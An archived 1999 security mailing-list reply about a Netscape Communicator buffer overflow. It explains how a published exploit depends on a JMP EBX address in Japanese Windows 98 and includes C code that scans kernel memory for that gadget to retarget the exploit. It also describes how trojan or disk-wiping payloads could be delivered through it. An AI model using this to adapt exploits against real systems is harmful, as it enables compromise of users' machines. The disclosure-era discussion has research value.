Re: Netscape communicator 4.06J, 4.5J-4.6J, 4.61e Buffer Overflow

From: UNYUN (shadowpenguinat_private)
Date: Sun Sep 12 1999 - 07:04:53 PDT

    Hello

    David Parker writes:

    > I tried the 4 exploit test links, and they all crashed Netscape but
    > didn't cause any bluescreens or run any programs. I have win98,
    > Netscape 4.5 128-bit, and the same msvcrt.dll (6.00.8397). I'm not
    > sure how to debug the crashes, so I'm including the illegal operation
    > errors, hopefully they will be of some help:

    We could confirm that the exploit codes which were published at the demo
    site were executed. We think that the reason you can not confirm the
    executed the exploit codes is based on the difference of the Windows
    kernel code. The exploit code which is posted by R00tZer0 is for
    Japanese Windows98, this exploit uses the codes which is written in
    0xbff7a06b. In case Japanese Windows98, JMP EBX(FFH,E3H) code is written
    in such address. If you remake the exploit code that can exploit the
    specified netscape communicators, you have to change the address which
    is specified in the exploit code. We don't have the environment of the
    English Windows, we could not code for English Windows. Maybe, you will
    be able to get the address of JMP EBX code by the following program. So,
    if someone succeeded or could get the address which is written the JMP
    EBX code, please tell us the address of JMP EBX code.

    #include <windows.h>
    #include <stdio.h>

    unsigned int mems[]={
    0xbfb70000,0xbfbfc000,
    0xbfde0000,0xbfde6000,
    0xbfdf0000,0xbfdf5000,
    0xbfe00000,0xbfe10000,
    0xbfe30000,0xbfe43000,
    0xbfe80000,0xbfe86000,
    0xbfe90000,0xbfe96000,
    0xbfea0000,0xbfeb0000,
    0xbfee0000,0xbfee5000,
    0xbff20000,0xbff47000,
    0xbff50000,0xbff61000,
    0xbff70000,0xbffc6000,
    0xbffc9000,0xbffe3000,
    0,0};

    void search_mem(FILE *fp,unsigned char *st,unsigned char *ed,
                    unsigned char c1,unsigned char c2)
    {
        unsigned char   *p;

        fprintf(fp,"Result : %x - %x\n",(unsigned int)st,(unsigned int)ed);
        for (p=st;p<ed;p++)
            if (*p==c1 && *(p+1)==c2)
                fprintf(fp,"%x : %x %x %x %x\n",p,*p&255,*(p+1)&255,*(p+2)&255,*(p+3)&255);
    }
    int APIENTRY WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance,
                          LPTSTR lpCmdLine, int nCmdShow)
    {
        FILE            *fp;
        int             i;

        if ((fp=fopen("adr.txt","w"))!=NULL){
            for (i=0;;i+=2){
                if (mems[i]==0) break;
                search_mem(fp,(unsigned char *)mems[i],(unsigned char *)mems[i+1],0xff,0xe3);
            }
            fclose(fp);
        }
        return 0;
    }

    Kerb writes:

    >  When I went there with NC 4.05, it gave me a blue screen of death that was
    > completely unrecoverable.  I had to reboot the system.
    > So, basically, it is a DoS for Netscape users, could possibly be coded
    > into a CGI or Javascript that checks browser
    > version and writes the corresponding exploit code.   Just a thought.

    The CGIs which are published at the demo site are not for DoS attack. Of
    course, we could develop the codes for the DoS attack. We also could
    develop the HDD format code, virus code, trojan code, and so on. If the
    trojan code is written in the exploit code, the all visitors'  PC will
    be cracked, and if the hdd format code is written, the visitors' HDD
    will be cleaned completely. It's very serious problem. In this case, the
    stack area that can be used for exploit code is wide enough.

    I will post the demo programs which can send the trojan by using the
    security hole on other applications.

    -----
     The Shadow Penguin Security (http://shadowpenguin.backsection.net)
     Webmaster / UNYUN (shadowpenguinat_private)